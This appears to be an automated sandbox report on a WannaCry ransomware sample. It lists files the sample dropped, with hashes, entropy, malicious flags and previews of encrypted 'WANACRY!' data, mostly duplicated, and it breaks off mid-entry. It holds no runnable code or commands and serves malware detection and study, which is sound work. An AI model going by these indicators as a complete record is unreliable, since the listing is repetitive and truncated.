                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......FDT2.....<6....`wcW.[........J...#....5..5b/....OF.h.*.a.J.(.,'......n(.Z..Z.....Ij!.....D.[...ea>9..... .[..... ..N..$........NI..._$g.....%R...n...... .O.._..@.I...c....3...H'...A{...~C=....'...W..S.0.T.`...~...j...6.uIk.uE...D......./q......~.......w.k....M..Ur..Z...Q... Y]..M...'...*.{.[dv.,r.i_....z.V..%....a...+...k..e......]....9r.i..7..@...ZlO.*..._.e..Q..Z.....\.b.a.....`/?.......2.......ggzD.l...4Ym..m..:.nbX!......B..F.....G.\.`S...E$........*...+ C.63d-b......{.(..k.F2%..D........b/.......!....,.W3[.W.vI>..m.T..k....R.9...&i>....G'....)b.".Z..!U.Qk...#<...<.;.U.>.q...(.,..0C.SQ:1p6...y...(^uT..p.?.0..w.5...._...oN..2..ftn.K..):.....).c...C..I.~b!Xg.wy.B...h..S.!.9..5...Wfs..b..i...N.bI._.+..1}.0.y..2XjT.c.:6..j.R.$......5...AP.e.O..?e.V..$w...2JA..BJJN.=..n._.?.S_..{.%$[|.VJa.#./KR...J.9.n..OH....:.'_?#.....w..(...~t>..Cs+&..:<|..f.+i.S.....P.s...=.......i.1<.>(........f...**y$.....b....d.....X....Q.]....CA....|7l
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4024
                                                                                      Entropy (8bit):7.957884934686399
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oY0A2IKoGwsgej4/5OaLt4msUK1hTm0R5uPRbbTOusu8mEZOo4JznL:3AfXg5fxPS38RbbTOdu8mEMt
                                                                                      MD5:23330AB4A1A8BE47BA0EC29E3FC5B5D1
                                                                                      SHA1:146C514BA609013B1024528031B56F09D2D7D979
                                                                                      SHA-256:E44AE4569DFB2ED2CA49EE91D0B4523FBCA06F93253A18F7165D808D087D25A1
                                                                                      SHA-512:141AAA149C65C8E09AC69841BDC1B959E6F8030823A735ECF8B9A1C1B0E6694055FCB42CEEA775DB25BC7F36D7792F31900D083D17BE16228F4D22150EBEBCAA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....x.74..O3.-..{..js.(Qc........!..... .^..y.$N.b5..3MK.w...n..-w.<..v$Ge.B...I.uO.).....F.U..'..\:..$2.k...C...!.......9<...M6.8....A.Na..C..q..;.............HOt.=.C......[.<.O.!...ia.s.".).H..]2.Rr..>Y..G5J.9!..j..qg.....,:..|.?..z6Ce../.5..(..(................x..+.A...nb..jO......w.Fv..~.`.M#f..=5..%..$608...>..;.........f..... J..5iD..~5...B#.......%'.~/..T.T..d..;G.......K..W:..........jq$.5..T.*?..&.....m.m$1......iV.i8=u).H .q..1/Tx.+.20c.j.dN'......WPC.......h.4.}2.....a#T...KG..3.<....2..T-=...;......$..[..7.XY......!;.*.f9G..`k...Z.=.?B....B,..F';.H..l..'......7.UHZ:D....c>...8..j[..G1`C...#./.o....(.N2...u.= .p3.-r..1...A$.....n.S....)+...].a4.t(?.6.oJ.5.......~k.zI9.<.R.Q.CFXx8.m.}..j.,'.}. ..qW.'.7!.2....j....K.....L...d.....N.....H..+..1t[.{w.@.!*.f.i....Y..4.......X^,...S.u.1.]....-...L(..<.-.;x..@.....e.8C...m..7.}....k...]......-..x..Y-bjX...q...`F./.\~}.......S5.28Q.T.....s..J5.....F......G..3...2.%.%pz 1........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4024
                                                                                      Entropy (8bit):7.957884934686399
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oY0A2IKoGwsgej4/5OaLt4msUK1hTm0R5uPRbbTOusu8mEZOo4JznL:3AfXg5fxPS38RbbTOdu8mEMt
                                                                                      MD5:23330AB4A1A8BE47BA0EC29E3FC5B5D1
                                                                                      SHA1:146C514BA609013B1024528031B56F09D2D7D979
                                                                                      SHA-256:E44AE4569DFB2ED2CA49EE91D0B4523FBCA06F93253A18F7165D808D087D25A1
                                                                                      SHA-512:141AAA149C65C8E09AC69841BDC1B959E6F8030823A735ECF8B9A1C1B0E6694055FCB42CEEA775DB25BC7F36D7792F31900D083D17BE16228F4D22150EBEBCAA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....x.74..O3.-..{..js.(Qc........!..... .^..y.$N.b5..3MK.w...n..-w.<..v$Ge.B...I.uO.).....F.U..'..\:..$2.k...C...!.......9<...M6.8....A.Na..C..q..;.............HOt.=.C......[.<.O.!...ia.s.".).H..]2.Rr..>Y..G5J.9!..j..qg.....,:..|.?..z6Ce../.5..(..(................x..+.A...nb..jO......w.Fv..~.`.M#f..=5..%..$608...>..;.........f..... J..5iD..~5...B#.......%'.~/..T.T..d..;G.......K..W:..........jq$.5..T.*?..&.....m.m$1......iV.i8=u).H .q..1/Tx.+.20c.j.dN'......WPC.......h.4.}2.....a#T...KG..3.<....2..T-=...;......$..[..7.XY......!;.*.f9G..`k...Z.=.?B....B,..F';.H..l..'......7.UHZ:D....c>...8..j[..G1`C...#./.o....(.N2...u.= .p3.-r..1...A$.....n.S....)+...].a4.t(?.6.oJ.5.......~k.zI9.<.R.Q.CFXx8.m.}..j.,'.}. ..qW.'.7!.2....j....K.....L...d.....N.....H..+..1t[.{w.@.!*.f.i....Y..4.......X^,...S.u.1.]....-...L(..<.-.;x..@.....e.8C...m..7.}....k...]......-..x..Y-bjX...q...`F./.\~}.......S5.28Q.T.....s..J5.....F......G..3...2.%.%pz 1........
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1752
                                                                                      Entropy (8bit):7.904508152676311
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk/pEKMGetZxORa5TAJ0LZ4XWIBpKaW+oyuQkvGTaAbK3:oCfGWZxOE5Tiq4mIBpKaW+ooiG+uK3
                                                                                      MD5:B357D1EC0AD823344B3DD95EE978C2D6
                                                                                      SHA1:CC82B5447FB692FC4B17A0F4576DADA3E1396761
                                                                                      SHA-256:3260D4222A5A5149FFADC450072E4246779C1762B3937ADAD3A8E0B19E886293
                                                                                      SHA-512:D596FDEECB965F64B95DB48DED1B801C1068C18F53E7D1E511DF2FA33D6F0DB6768878839E0511965BF1F8DB82F16C2E291813E27DBE92A71E90509C7A844F54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..../...9..'X...jB..2.|~......#^>lV..].....[..].XW).Q.......^...LR.Px.h./.^....~@.X...A...!$M.2.Z..>...d...w.4%...9...o.._.y......../.u...".G..}.'.K......0.$....t...7..!K.;g..g 7?....g.....`'d.N.zeZ.')........v:\..x+.....eI...D..;f./.'#;~8.j;.5.a5i..+B................aN.....6QAo....2.W2...H!........#.X.(....`..*.8er.d....2u...6(.Sc......}..!PN........F...s...v..%,....h-[!....E.rc.o..\>o_....)...r.L.}..}.t&.B...E...A...>.?.._...4....X.{...w.c.+..h.H)...GR./#..Z{y.f.....n\5n.g.:.h..jBs...cn...`...J......2...9l/u.......".@........j.@.q..L.Eh.H.....C..9^.^.S&lLg..`.......&~?9.{.. ..4. =N.d.N.F.S.r$.{.z.L..]....1..p......w.>...<.&N_.W(ul....2...m...p.H...+1....9.i...^..7..~.....-..R........ +....pUz...AZ.F.M...C_k.B......G..1SB@...I.Hu2.;.bX..;..d......#.4.\.mE..-..[..N`..f.U..Ied..0"Y.z|.t..i+...YH.]....l.....1s.............I?....H...P$...$U..c..2...C.,B...^m..3.E.1....Q!EP..s~mJ}..4./{.)i?o8.5....%...G`5#$B=.....c...O;.....6.`....1q...Q{#.cv.[.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1752
                                                                                      Entropy (8bit):7.904508152676311
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk/pEKMGetZxORa5TAJ0LZ4XWIBpKaW+oyuQkvGTaAbK3:oCfGWZxOE5Tiq4mIBpKaW+ooiG+uK3
                                                                                      MD5:B357D1EC0AD823344B3DD95EE978C2D6
                                                                                      SHA1:CC82B5447FB692FC4B17A0F4576DADA3E1396761
                                                                                      SHA-256:3260D4222A5A5149FFADC450072E4246779C1762B3937ADAD3A8E0B19E886293
                                                                                      SHA-512:D596FDEECB965F64B95DB48DED1B801C1068C18F53E7D1E511DF2FA33D6F0DB6768878839E0511965BF1F8DB82F16C2E291813E27DBE92A71E90509C7A844F54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..../...9..'X...jB..2.|~......#^>lV..].....[..].XW).Q.......^...LR.Px.h./.^....~@.X...A...!$M.2.Z..>...d...w.4%...9...o.._.y......../.u...".G..}.'.K......0.$....t...7..!K.;g..g 7?....g.....`'d.N.zeZ.')........v:\..x+.....eI...D..;f./.'#;~8.j;.5.a5i..+B................aN.....6QAo....2.W2...H!........#.X.(....`..*.8er.d....2u...6(.Sc......}..!PN........F...s...v..%,....h-[!....E.rc.o..\>o_....)...r.L.}..}.t&.B...E...A...>.?.._...4....X.{...w.c.+..h.H)...GR./#..Z{y.f.....n\5n.g.:.h..jBs...cn...`...J......2...9l/u.......".@........j.@.q..L.Eh.H.....C..9^.^.S&lLg..`.......&~?9.{.. ..4. =N.d.N.F.S.r$.{.z.L..]....1..p......w.>...<.&N_.W(ul....2...m...p.H...+1....9.i...^..7..~.....-..R........ +....pUz...AZ.F.M...C_k.B......G..1SB@...I.Hu2.;.bX..;..d......#.4.\.mE..-..[..N`..f.U..Ied..0"Y.z|.t..i+...YH.]....l.....1s.............I?....H...P$...$U..c..2...C.,B...^m..3.E.1....Q!EP..s~mJ}..4./{.)i?o8.5....%...G`5#$B=.....c...O;.....6.`....1q...Q{#.cv.[.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):45208
                                                                                      Entropy (8bit):7.996374881257064
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:mgP0F7oTOnB8iUUKZVYr/19mjDYGmoI6NHJEOSeuO8oPjPEkB4iZEZY0fGOziVbB:FpSyFHe/1QXtIOHqOh2+jPE9GkQ2/a
                                                                                      MD5:2A0D4813B175CC3FCEDC7BB723E079AE
                                                                                      SHA1:A8642E39492581389055BCEE820124B4372051F1
                                                                                      SHA-256:3EC48A0DCC17EBBECB39BCCE31BBED87411F1560AB4561FF4201D890D47B8E8C
                                                                                      SHA-512:9BF0B44C80999E0A97D5C87EACB73BA52062AA73218F666CB41C857BD5647BA762EDE6E683EB4CF459776A5E8BB62397E44FF04D5E5C7B52DD039442D6C17DE7
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....V...%Fq.UE..jv..K}..Xz"...[.7..).i........S...$}.#..h...T....Eg..<....S.z...n....z.U#..+.c.R...z].......dv8.&..(d..)-...t...?....G....[k.!.(E.S.....|.Vb....+.....2.B^.(V.C.S.J....L...,..".l..riV..........j..Zl..2%.K.{Z.|......E...`.C...]..."....}.........:P....W..Z..#ZV.._a(.....%.f...`.-..u..8U.....3.".A..Xo..`*1.-.(..M..-*..V..S.Q.l.[+.x...Q....;.......p....-...E.....zQ.U.cD.Q..e.%Giv'g............0.}...3..v.........o..Z..S....6..?...>.S..)...X`".Zu.w.\.AcFb.g_F.....9o...v.]..8.......c..@Y.9_*.....'....%...*.k...#..b.b..>.....~.....:"..RJSm.W$d.o..%.3...P3.J9j..l2LI..m..7...C\.?....y.!.Db.^.\.>..U.........Ph.....B(=....>...%@.&4........0E..J.]K.......zaRu.S../2.(...d*.}.....Ew...U.,....R...D*.Q0....v*F.Y.[tq..rH.^.e..!.vs........'..<....x.8.<...$...y.....9..K.wWz......[.A........i.f.(....K.....zd.(.......K$b....u..^....D....X....b..l..^J..vC..."sS[|.y..a....q.3....9.J<./..0.kF1...DV.*s/*.&.I.]...h............s...=.zO.....N.`.6
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):45208
                                                                                      Entropy (8bit):7.996374881257064
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:mgP0F7oTOnB8iUUKZVYr/19mjDYGmoI6NHJEOSeuO8oPjPEkB4iZEZY0fGOziVbB:FpSyFHe/1QXtIOHqOh2+jPE9GkQ2/a
                                                                                      MD5:2A0D4813B175CC3FCEDC7BB723E079AE
                                                                                      SHA1:A8642E39492581389055BCEE820124B4372051F1
                                                                                      SHA-256:3EC48A0DCC17EBBECB39BCCE31BBED87411F1560AB4561FF4201D890D47B8E8C
                                                                                      SHA-512:9BF0B44C80999E0A97D5C87EACB73BA52062AA73218F666CB41C857BD5647BA762EDE6E683EB4CF459776A5E8BB62397E44FF04D5E5C7B52DD039442D6C17DE7
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....V...%Fq.UE..jv..K}..Xz"...[.7..).i........S...$}.#..h...T....Eg..<....S.z...n....z.U#..+.c.R...z].......dv8.&..(d..)-...t...?....G....[k.!.(E.S.....|.Vb....+.....2.B^.(V.C.S.J....L...,..".l..riV..........j..Zl..2%.K.{Z.|......E...`.C...]..."....}.........:P....W..Z..#ZV.._a(.....%.f...`.-..u..8U.....3.".A..Xo..`*1.-.(..M..-*..V..S.Q.l.[+.x...Q....;.......p....-...E.....zQ.U.cD.Q..e.%Giv'g............0.}...3..v.........o..Z..S....6..?...>.S..)...X`".Zu.w.\.AcFb.g_F.....9o...v.]..8.......c..@Y.9_*.....'....%...*.k...#..b.b..>.....~.....:"..RJSm.W$d.o..%.3...P3.J9j..l2LI..m..7...C\.?....y.!.Db.^.\.>..U.........Ph.....B(=....>...%@.&4........0E..J.]K.......zaRu.S../2.(...d*.}.....Ew...U.,....R...D*.Q0....v*F.Y.[tq..rH.^.e..!.vs........'..<....x.8.<...$...y.....9..K.wWz......[.A........i.f.(....K.....zd.(.......K$b....u..^....D....X....b..l..^J..vC..."sS[|.y..a....q.3....9.J<./..0.kF1...DV.*s/*.&.I.]...h............s...=.zO.....N.`.6
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2184
                                                                                      Entropy (8bit):7.90084336059092
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkZTsnfJPtMm56wUiKrdKKIOGIGOUkHkVRi48hmZZoEbzZ9:oZsBtMUW1d5D1GOWRJ/
                                                                                      MD5:9C38843B652B85A16B32050EE360856F
                                                                                      SHA1:50CEDED2202C4D819278162033336A7DEE53A168
                                                                                      SHA-256:9374651647CB20F4FC36356B54CAB4131B2ECE049EA304F0C9CB2FFD1F0C34CE
                                                                                      SHA-512:49D8D65FD3234F33FD1298BC7FB08B8F95120D44352C3A5D48E59C7C54C477F53276A3F29DBDA14DA671D22E9FFE81DB88661C3DBFDAC003E3321A28E318B7A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....L.~Hc.,<I.......g_{.''...c...L......>...w..>.E.x{C2..5..5.B.}.$0.....$p7..Y.....(.....J>.6.h^.....{v.1.1=.4.D>.P..Q...hN..5..@.%..e.0...aS....4....K.......TNN..3..6.%1.x...n.W'ssT7.<Z.{....x.Y..e.T"N.p.r?..<.*p...+...."....'..g..0.......8...c.s....b.........}..g...EY.'&& ....j..}.....I..r..%U..5.|.......P..`...b9..[...E....a..<......-.#...H.6..X.}.V;............g)Q.J.% H..".r....C..k..*.$.3....Z...~l...5`./.Im......e.`...8..?....3\. .....W|.G.}(.O.l=H..e..7....{k.V......j.Q!.......I....U.....}.{.l....1.,...C......J..82..l..%.$`B..h.Zr....i&...r.f:.Z....[.y....n...F./VtA.Hn...@\.p3..b......".].r.=..J.7X5.(..,.7..M..(FN.7k(..R.Y.8..L...'.....#{.T.s.i.....z....LSAm.y.-R..f..HW.<..L&.j..5..a\.....4.NGw...Y(...Tk.k.}..l.i&.9.M.$....54.5...E..E.d3..HW....'....j.v..sJ..z3GE..Wc...8.....2[...q.U..GT~Uj......j.G.Y....^......@...Y7...X%*.#'....7..LL..vL...Yx.......}.ta'..A..O9.W.^.....?..H.neM."....*.E...p)c.N.....l......t...3.....>.*nU.y...e
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2184
                                                                                      Entropy (8bit):7.90084336059092
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkZTsnfJPtMm56wUiKrdKKIOGIGOUkHkVRi48hmZZoEbzZ9:oZsBtMUW1d5D1GOWRJ/
                                                                                      MD5:9C38843B652B85A16B32050EE360856F
                                                                                      SHA1:50CEDED2202C4D819278162033336A7DEE53A168
                                                                                      SHA-256:9374651647CB20F4FC36356B54CAB4131B2ECE049EA304F0C9CB2FFD1F0C34CE
                                                                                      SHA-512:49D8D65FD3234F33FD1298BC7FB08B8F95120D44352C3A5D48E59C7C54C477F53276A3F29DBDA14DA671D22E9FFE81DB88661C3DBFDAC003E3321A28E318B7A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....L.~Hc.,<I.......g_{.''...c...L......>...w..>.E.x{C2..5..5.B.}.$0.....$p7..Y.....(.....J>.6.h^.....{v.1.1=.4.D>.P..Q...hN..5..@.%..e.0...aS....4....K.......TNN..3..6.%1.x...n.W'ssT7.<Z.{....x.Y..e.T"N.p.r?..<.*p...+...."....'..g..0.......8...c.s....b.........}..g...EY.'&& ....j..}.....I..r..%U..5.|.......P..`...b9..[...E....a..<......-.#...H.6..X.}.V;............g)Q.J.% H..".r....C..k..*.$.3....Z...~l...5`./.Im......e.`...8..?....3\. .....W|.G.}(.O.l=H..e..7....{k.V......j.Q!.......I....U.....}.{.l....1.,...C......J..82..l..%.$`B..h.Zr....i&...r.f:.Z....[.y....n...F./VtA.Hn...@\.p3..b......".].r.=..J.7X5.(..,.7..M..(FN.7k(..R.Y.8..L...'.....#{.T.s.i.....z....LSAm.y.-R..f..HW.<..L&.j..5..a\.....4.NGw...Y(...Tk.k.}..l.i&.9.M.$....54.5...E..E.d3..HW....'....j.v..sJ..z3GE..Wc...8.....2[...q.U..GT~Uj......j.G.Y....^......@...Y7...X%*.#'....7..LL..vL...Yx.......}.ta'..A..O9.W.^.....?..H.neM."....*.E...p)c.N.....l......t...3.....>.*nU.y...e
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):71000
                                                                                      Entropy (8bit):7.997651682294898
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Pg1Ry7EvzY9FOyuHomuKvQbneKmoxLNZps6zVUc2BjmwQcdY:S84vzY9FOyu1hIrwoxL72Bj+GY
                                                                                      MD5:0418D03A1886AD539173D73323E7EE56
                                                                                      SHA1:85A12C1B767CCA47B0678648775C220DA27C7117
                                                                                      SHA-256:162CA62F1899BAAA0F2194B48EBF2DB93A3D1C6FCD6729A6FFFA53098A220B36
                                                                                      SHA-512:EC50D67D88DAAFD418FCDB8C92DA6CBEF09E9C7D60A89CFE498108E0937409E61EE8D6AF49882A88F621D469FE0FDEB072E2DE7DB1A9B17FACADD356113705F3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......-..}^N.Y&..s..t.O.0mY..0...K.y..4.............`.J..;T.y...?......sBn.J.=..T.R_..u..21 M.588i=..Q...j -r..%.......7.B.;.n...~..r..;@...i..X,C~5.L.g...CF..7...D*m.o...Y.L....;]..uSV.....@......>......N.(...h.6E'6....g............y/...=*TP....;.......5..g...K..B............m|j.%..u.J..|.~..!..S.Cl../c..a.H..t.&Q.....\..#.KF......y29..g..(..T!.,...J.q.}.R.m&i..b..p.m{.@..\.m...+...%X..Fb....V.r.0.<.z..v..?Qp.E=.....p.hM.n...,...)..W.a.M..I.L..L.(...@...L."...)...o...mF..%<...@.bs{....6R.,..v~...[.q6k4.....Yy........J..N.1ZY.(.......ok:.......$.....z...M.F..Kl?.e...h]...g..9..o'0...9.a.a.fc....B.'.@.#V!;..c..bM......t..M.L"h.O.#..i?1.25.eh..;..T...*Ow.Y.t.X...CI..#.B+....v......2a". F.X......,&.`....*.I..]...$3...u..4d.........#;..!..y"...9...x.t#,M.......W.r....w/n....j..;......Ge......Bw..jm.cF...>{..y.#.P.4.....-..f....|.#.rV.$4.1/IC.'...&,....d...z3..6i...6....N.|.K...-g.c..`.a..D.=.........0hu.]..i...p.S..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):71000
                                                                                      Entropy (8bit):7.997651682294898
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Pg1Ry7EvzY9FOyuHomuKvQbneKmoxLNZps6zVUc2BjmwQcdY:S84vzY9FOyu1hIrwoxL72Bj+GY
                                                                                      MD5:0418D03A1886AD539173D73323E7EE56
                                                                                      SHA1:85A12C1B767CCA47B0678648775C220DA27C7117
                                                                                      SHA-256:162CA62F1899BAAA0F2194B48EBF2DB93A3D1C6FCD6729A6FFFA53098A220B36
                                                                                      SHA-512:EC50D67D88DAAFD418FCDB8C92DA6CBEF09E9C7D60A89CFE498108E0937409E61EE8D6AF49882A88F621D469FE0FDEB072E2DE7DB1A9B17FACADD356113705F3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.......-..}^N.Y&..s..t.O.0mY..0...K.y..4.............`.J..;T.y...?......sBn.J.=..T.R_..u..21 M.588i=..Q...j -r..%.......7.B.;.n...~..r..;@...i..X,C~5.L.g...CF..7...D*m.o...Y.L....;]..uSV.....@......>......N.(...h.6E'6....g............y/...=*TP....;.......5..g...K..B............m|j.%..u.J..|.~..!..S.Cl../c..a.H..t.&Q.....\..#.KF......y29..g..(..T!.,...J.q.}.R.m&i..b..p.m{.@..\.m...+...%X..Fb....V.r.0.<.z..v..?Qp.E=.....p.hM.n...,...)..W.a.M..I.L..L.(...@...L."...)...o...mF..%<...@.bs{....6R.,..v~...[.q6k4.....Yy........J..N.1ZY.(.......ok:.......$.....z...M.F..Kl?.e...h]...g..9..o'0...9.a.a.fc....B.'.@.#V!;..c..bM......t..M.L"h.O.#..i?1.25.eh..;..T...*Ow.Y.t.X...CI..#.B+....v......2a". F.X......,&.`....*.I..]...$3...u..4d.........#;..!..y"...9...x.t#,M.......W.r....w/n....j..;......Ge......Bw..jm.cF...>{..y.#.P.4.....-..f....|.#.rV.$4.1/IC.'...&,....d...z3..6i...6....N.|.K...-g.c..`.a..D.=.........0hu.]..i...p.S..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):344344
                                                                                      Entropy (8bit):7.999411209794239
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:J4ltojV+rvBXzZvO2X/C/QpEe/bZGDBZpsrpX7ehQ0Nq7B1oG6:6rojmXzZG2v9b2XyrB6K116
                                                                                      MD5:4D15A715C20CA15847F8905562A9E042
                                                                                      SHA1:130D1ADD44BBE70DFDA821DCFEDEF5216155EFDA
                                                                                      SHA-256:ABE411CCDF827067F3C2C5C6AF2123B35ADC6D855EE26030A9819F12FFD075B8
                                                                                      SHA-512:192CED399E1C9D58FF8969152D6F5264FBBECCD62CFE33A26A6D9B12BC63D4462C07A72BA1EA3C576EE709BEEFDA53268CE6777615C3B56634471C2ABB846CB1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....,0.......HO.>...x..^Z.7xk.C...DYq...5.y:....K.K.g...#Y....!.d>2 k.6..C_.m{.P.J..|6V.x*=N0..1..Q.it`...a.........T..4.c..x.v...\...1=.=....G..A%k;o^.O..`.H>.C..FTN....<...O)...K..tV....[..>.}N..h.#.Y...g..R..5.%.....X.g....n...._..$(:e%i....c..J.....?.......T....[.K..|.Z...g.#[..^>..9...._.y.d...J..O..>...&"S..eQu{l.wf.....z..6.F.Av...R...f.K..!.8S.g...U;5.......1G>...j5J.).~>=@]....]JK........fY........l..J..*.3......".W`'....c.._.K.....T.N.&..M./.2[..+~....SE.yBI..7..V..D.Y....q3...+.nj..Q,K.1W5.......f..@ .@3.x,...z4.u...e}K.-.2.&..w.t|...\..)J.....n..w.PS..r..TA./.}....."z~.V....<......+..V....%.W...@....&...9....~...$.w.W.....%.o..Z.3..M.[..{.nPg.;.t..t..k.>....P....4k=V.G.....V!.....1V1).v3..(.s)s..V.{e.sE9....N.|K.....&.Q.;#..<'YG..x...Y.>.@.w.ra...:.........f..${.....PNSt..,.y....Y@..}..r.../.mI..f..?l..G.,..s.-..!1.2..Y.P.(.a.....-R.AVn?DgG.|H.G]..)..9d.....u.6.H..'...<V.l....`..7ca..6x2..^.e.....Cs...#...a.....T>.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):344344
                                                                                      Entropy (8bit):7.999411209794239
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:J4ltojV+rvBXzZvO2X/C/QpEe/bZGDBZpsrpX7ehQ0Nq7B1oG6:6rojmXzZG2v9b2XyrB6K116
                                                                                      MD5:4D15A715C20CA15847F8905562A9E042
                                                                                      SHA1:130D1ADD44BBE70DFDA821DCFEDEF5216155EFDA
                                                                                      SHA-256:ABE411CCDF827067F3C2C5C6AF2123B35ADC6D855EE26030A9819F12FFD075B8
                                                                                      SHA-512:192CED399E1C9D58FF8969152D6F5264FBBECCD62CFE33A26A6D9B12BC63D4462C07A72BA1EA3C576EE709BEEFDA53268CE6777615C3B56634471C2ABB846CB1
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....,0.......HO.>...x..^Z.7xk.C...DYq...5.y:....K.K.g...#Y....!.d>2 k.6..C_.m{.P.J..|6V.x*=N0..1..Q.it`...a.........T..4.c..x.v...\...1=.=....G..A%k;o^.O..`.H>.C..FTN....<...O)...K..tV....[..>.}N..h.#.Y...g..R..5.%.....X.g....n...._..$(:e%i....c..J.....?.......T....[.K..|.Z...g.#[..^>..9...._.y.d...J..O..>...&"S..eQu{l.wf.....z..6.F.Av...R...f.K..!.8S.g...U;5.......1G>...j5J.).~>=@]....]JK........fY........l..J..*.3......".W`'....c.._.K.....T.N.&..M./.2[..+~....SE.yBI..7..V..D.Y....q3...+.nj..Q,K.1W5.......f..@ .@3.x,...z4.u...e}K.-.2.&..w.t|...\..)J.....n..w.PS..r..TA./.}....."z~.V....<......+..V....%.W...@....&...9....~...$.w.W.....%.o..Z.3..M.[..{.nPg.;.t..t..k.>....P....4k=V.G.....V!.....1V1).v3..(.s)s..V.{e.sE9....N.|K.....&.Q.;#..<'YG..x...Y.>.@.w.ra...:.........f..${.....PNSt..,.y....Y@..}..r.../.mI..f..?l..G.,..s.-..!1.2..Y.P.(.a.....-R.AVn?DgG.|H.G]..)..9d.....u.6.H..'...<V.l....`..7ca..6x2..^.e.....Cs...#...a.....T>.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7752
                                                                                      Entropy (8bit):7.9756158511082855
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:H8Bhj2PtbWh//p6gUMidCH3xhF94BcgEYUi9kIE6G8B/10j:H8nj2PdWdMgAdCBZCxE6DNe
                                                                                      MD5:6CB75E13BCD806595F98C6FAA77972B8
                                                                                      SHA1:4D85BEA0874901CAFA29AADC7EF7551C7CFA5905
                                                                                      SHA-256:4318080ECC4C93F8ACED0FE6C29E81759C9254FD43DAFF06C3FB641EBC26A681
